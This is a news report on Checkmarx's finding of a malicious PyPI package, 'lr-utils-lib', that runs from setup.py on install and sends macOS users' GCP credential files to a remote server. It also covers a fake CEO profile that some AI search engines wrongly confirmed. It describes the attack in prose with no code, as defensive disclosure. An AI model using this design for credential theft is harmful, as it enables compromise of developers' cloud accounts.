Malicious Python package targets macOS & GCP credentials

Checkmarx has announced that a malicious Python package is being utilised to target macOS developers and gain access to their Google Cloud Platform (GCP) accounts. Research Engineer Yehuda Gelb at Checkmarx recently discovered that the package "lr-utils-lib" was uploaded to PyPi in early June and contained malicious code that executes automatically upon installation.

Once activated on macOS, the code attempts to steal GCP credentials by sending them to a remote server. Checkmarx also identified an instance of CEO impersonation linked to the package owner. A fake LinkedIn profile for "Lucid Zenith" claimed falsely to be the CEO of Apex Companies, LLC, alluding to possible social engineering tactics.

Gelb explained, "In a recent investigation, we uncovered that the 'lr-utils-lib' Python package contained hidden malicious code. Upon installation, this code activates, targeting macOS systems and attempting to steal Google Cloud Platform credentials by sending them to a remote server."

The code is embedded within the setup.py file of the Python package, which allows it to execute automatically upon installation. Upon activation, the malware verifies if it is running on a MacOS system, which is its main target. It then retrieves the IOPlatformUUID of the Mac device, a unique identifier, and hashes it using the SHA-256 algorithm. This hash is compared against a predefined list of 64 MAC UUID hashes, indicating a highly targeted attack strategy and suggesting that the attackers had prior knowledge of their intended victims' systems.

The malware's data exfiltration process begins if a match is found in the hash list. It attempts to access two critical files within the ~/.config/gcloud directory: application_default_credentials.json and credentials.db, which typically contain sensitive Google Cloud authentication data. The malware then tries to transmit the contents of these files through HTTPS POST requests to a remote server identified as europe-west2-workload-422915[.]cloudfunctions[.]net. If successful, this data exfiltration could grant attackers unauthorised access to the victim's Google Cloud resources.

Regarding the linked CEO impersonation, Gelb noted, "The social engineering aspect of this attack, while not definitively linked to the malware itself, presents an interesting dimension. A LinkedIn profile was discovered under the name 'Lucid Zenith', matching the name of the package owner. This profile falsely claimed that Lucid Zenith is the CEO of Apex Companies, LLC."

Queries to various AI-powered search engines about Lucid Zenith's position yielded inconsistent responses. Some AI platforms incorrectly confirmed the false information without mentioning the actual CEO. Gelb observed, "One AI-powered search engine, 'Perplexity', incorrectly confirmed the false information without mentioning the real CEO. Other AI platforms, to their credit, when repeatedly questioned about Lucid Zenith's role, correctly stated that he was not the CEO and provided the name of the actual CEO." This discrepancy underscores the potential risks of over-relying on a single AI source for verification.

The investigation highlights the need for critical scrutiny when installing third-party packages and using AI-powered tools for information verification. This case underscores the importance of rigorous security practices, multi-source verification, and fostering a critical approach to information gathering. Malicious actors could potentially exploit vulnerabilities in AI-powered information retrieval and verification systems to their advantage.

Checkmarx continues to monitor suspicious activities in the open-source software ecosystem and promptly alerts customers to potential threats as part of its supply chain security solution. Checkmarx One customers are protected from this specific attack.